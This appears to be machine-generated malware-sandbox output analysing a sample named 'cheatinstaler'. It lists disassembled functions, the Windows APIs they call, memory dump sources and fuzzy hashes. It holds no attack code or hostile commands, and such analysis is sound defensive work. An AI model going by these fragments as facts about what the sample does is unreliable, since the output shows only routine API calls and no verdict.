                                                                                                  control_flow_graph 4101 7ff6c16c2ce0-7ff6c16c2d0a 4102 7ff6c16c2d13-7ff6c16c2d1b 4101->4102 4103 7ff6c16c2d0c-7ff6c16c2d0e 4101->4103 4105 7ff6c16c2d1d-7ff6c16c2d28 GetStdHandle 4102->4105 4106 7ff6c16c2d2b 4102->4106 4104 7ff6c16c2ea9-7ff6c16c2ec4 call 7ff6c16e2320 4103->4104 4105->4106 4108 7ff6c16c2d31-7ff6c16c2d3d 4106->4108 4110 7ff6c16c2d3f-7ff6c16c2d44 4108->4110 4111 7ff6c16c2d86-7ff6c16c2da2 WriteFile 4108->4111 4112 7ff6c16c2daf-7ff6c16c2db3 4110->4112 4113 7ff6c16c2d46-7ff6c16c2d7a WriteFile 4110->4113 4114 7ff6c16c2da6-7ff6c16c2da9 4111->4114 4116 7ff6c16c2ea2-7ff6c16c2ea6 4112->4116 4117 7ff6c16c2db9-7ff6c16c2dbd 4112->4117 4113->4114 4115 7ff6c16c2d7c-7ff6c16c2d82 4113->4115 4114->4112 4114->4116 4115->4113 4118 7ff6c16c2d84 4115->4118 4116->4104 4117->4116 4119 7ff6c16c2dc3-7ff6c16c2dd8 call 7ff6c16bb4f8 4117->4119 4118->4114 4122 7ff6c16c2e1e-7ff6c16c2e6d call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16bbca8 4119->4122 4123 7ff6c16c2dda-7ff6c16c2de1 4119->4123 4122->4116 4134 7ff6c16c2e6f-7ff6c16c2e86 4122->4134 4123->4108 4124 7ff6c16c2de7-7ff6c16c2de9 4123->4124 4124->4108 4126 7ff6c16c2def-7ff6c16c2e19 4124->4126 4126->4108 4135 7ff6c16c2e88-7ff6c16c2e9b 4134->4135 4136 7ff6c16c2e9d call 7ff6c16e220c 4134->4136 4135->4136 4137 7ff6c16c2ec5-7ff6c16c2ecb call 7ff6c16e7904 4135->4137 4136->4116
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$Handle
                                                                                                  • String ID:
                                                                                                  • API String ID: 4209713984-0
                                                                                                  • Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                                                                                                  • Instruction ID: df9f44305534817274fb7cfd75bfa4c7c65f65a0d4bb12f938d00777d0d6c7e1
                                                                                                  • Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                                                                                                  • Instruction Fuzzy Hash: BA51DE62A19A4282EF50DF26D86477A2320BF94B92F440139EECD87A94DF3CE485D700
                                                                                                  Function 00007FF6C16E03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                                  • String ID:
                                                                                                  • API String ID: 3750147219-0
                                                                                                  • Opcode ID: 8ac84998d56cbfc06436e092980a2427078748cedf39fe0d6c2cd6a8a766ee4c
                                                                                                  • Instruction ID: 9f6d54948eef43ac00fc0b6565fd1c078583f8015ad8ebd10490996cd9b90e65
                                                                                                  • Opcode Fuzzy Hash: 8ac84998d56cbfc06436e092980a2427078748cedf39fe0d6c2cd6a8a766ee4c
                                                                                                  • Instruction Fuzzy Hash: 6B51A162F1465284FF009FAAD8442AD2322AF45BA5F500736DEDC97BD6EF6CD641D380
                                                                                                  Function 00007FF6C16C3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2359106489-0
                                                                                                  • Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                                                                                                  • Instruction ID: 5519ca760a59917f2f6e7d0310ab80c8f0d031a986046072ed80d2de4d721857
                                                                                                  • Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                                                                                                  • Instruction Fuzzy Hash: 9731C262A0C78281EF60AF27A4642796362FF897A2F508231EEDDC37D5DF3CD8459644
                                                                                                  Function 00007FF6C16E2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452418845-0
                                                                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                                  • Instruction ID: 756d40b941c3151ccbc8e2aa1b8c256e45820eb56985773fcbca42029ce79bf8
                                                                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                                  • Instruction Fuzzy Hash: EB315E11E0C15342FB54AF679C113BA2692AF41746F445638EACECB3D7DE2DE604E2D0
                                                                                                  Function 00007FF6C16C2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2244327787-0
                                                                                                  • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                                  • Instruction ID: 09d9248398d925413c9f4601fccf3376eca9c30f9f5f682416cede5966ece622
                                                                                                  • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                                  • Instruction Fuzzy Hash: 57216F21A0C65281EF60BF23A41033963A4FB45B96F144539DEDDCA788CF7CE895A751
                                                                                                  Function 00007FF6C16CE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16CECD8: ResetEvent.KERNEL32 ref: 00007FF6C16CECF1
                                                                                                    • Part of subcall function 00007FF6C16CECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CED07
                                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CE974
                                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00007FF6C16CE993
                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6C16CE9AA
                                                                                                  • CloseHandle.KERNEL32 ref: 00007FF6C16CE9B7
                                                                                                    • Part of subcall function 00007FF6C16CEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA63
                                                                                                    • Part of subcall function 00007FF6C16CEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2143293610-0
                                                                                                  • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                                  • Instruction ID: 742e0fcfe4793870359d6f0dbb98091ab072cd8906aaa80aef3c4f0744ab8d7e
                                                                                                  • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                                  • Instruction Fuzzy Hash: 6F012D32A14A81A2E748EF22E5546ADB731FB84B81F004171DBED43625CF39E4B4D740
                                                                                                  Function 00007FF6C16CEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$CreatePriority
                                                                                                  • String ID: CreateThread failed
                                                                                                  • API String ID: 2610526550-3849766595
                                                                                                  • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                                  • Instruction ID: 31fa630eafc44433037b5afd717176f0be136163f475c7c7c4d31287bd52ed0c
                                                                                                  • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                                  • Instruction Fuzzy Hash: 9911A331A08A4281FB10EF12F8512B97371FB84786F644231EACE83669EF3CE595E710
                                                                                                  Function 00007FF6C16D946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                  • String ID: riched20.dll
                                                                                                  • API String ID: 174490985-3360196438
                                                                                                  • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                                  • Instruction ID: fe7c7de5098456621eabf77ac51cdbbaeffd7896c77f699dda542c560532fc73
                                                                                                  • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                                  • Instruction Fuzzy Hash: 28F06271A18A4182EB01DF21F8252AEB3A0FF88755F540135EACD86755DF7CE14DCB10
                                                                                                  Function 00007FF6C16D095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16D853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6C16D856C
                                                                                                    • Part of subcall function 00007FF6C16CAAE0: LoadStringW.USER32 ref: 00007FF6C16CAB67
                                                                                                    • Part of subcall function 00007FF6C16CAAE0: LoadStringW.USER32 ref: 00007FF6C16CAB80
                                                                                                    • Part of subcall function 00007FF6C16B1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16B1FFB
                                                                                                    • Part of subcall function 00007FF6C16B129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C16B1396
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16E01BB
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16E01C1
                                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6C16E01F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 3106221260-0
                                                                                                  • Opcode ID: f59522d12ea67105d58c7d38a79467439e8b2bca94c98ae11b85d9bfed72e7d6
                                                                                                  • Instruction ID: 8f7e0eedfe524a758e763697915f430ecbe1b8432d88b3ee2bd74ce30e4ce42c
                                                                                                  • Opcode Fuzzy Hash: f59522d12ea67105d58c7d38a79467439e8b2bca94c98ae11b85d9bfed72e7d6
                                                                                                  • Instruction Fuzzy Hash: 5D51C162F1464296FB00AFA6D8552FD2362AF85BC5F504235EECD9B7DAEE2CD500D380
                                                                                                  Function 00007FF6C16B1744 Relevance: 4.6, APIs: 3, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2371198981-0
                                                                                                  • Opcode ID: 0aea9c3c87e16ca9382b17eaa19c0ac0a5c93a98bd21b50b4506c2c51cf5c440
                                                                                                  • Instruction ID: febfa4b1d9df2e1fcc4f2bf361cfff24537963c62ca996807f158bb093cb09d8
                                                                                                  • Opcode Fuzzy Hash: 0aea9c3c87e16ca9382b17eaa19c0ac0a5c93a98bd21b50b4506c2c51cf5c440
                                                                                                  • Instruction Fuzzy Hash: 1841FE61B1868591EB049F23E54427AA365EF05BE1F548231EEFC8BBD5EF3CE091A304
                                                                                                  Function 00007FF6C16C2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2272807158-0
                                                                                                  • Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                                                                                                  • Instruction ID: 6b82d272120ba220eecd0297a51d571baa2b947327cf00e18a662caa747491d3
                                                                                                  • Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                                                                                                  • Instruction Fuzzy Hash: BB41BF72A0878282EB209F16E45466963A1FB84BB6F105338DFED43AD5CF7CE4A1D700
                                                                                                  Function 00007FF6C16B23F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2176759853-0
                                                                                                  • Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                                                                                                  • Instruction ID: 622aeab683a4e1a459abf55e5e342aeebb3e9ce62d555d31fff783215b3cfd7e
                                                                                                  • Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                                                                                                  • Instruction Fuzzy Hash: 59219C62A29B8281EB108F66A85017AA3A5FB89BD1F144235EBDD43B95DF3CE1908740
                                                                                                  Function 00007FF6C16D1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1875163511-0
                                                                                                  • Opcode ID: 5d5f35b7d0b1a8ec44982466ed86c266d3277025963138b758b7e20b27780546
                                                                                                  • Instruction ID: a756f728a89348573fb07a12553c6cf661f612bc4406b9bcb2338aaec3b3f59b
                                                                                                  • Opcode Fuzzy Hash: 5d5f35b7d0b1a8ec44982466ed86c266d3277025963138b758b7e20b27780546
                                                                                                  • Instruction Fuzzy Hash: A431A412E0C68651FB24AF16E4443B963A0FB50785F644135D2CC866A9DF7CEA96D301
                                                                                                  Function 00007FF6C16C3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
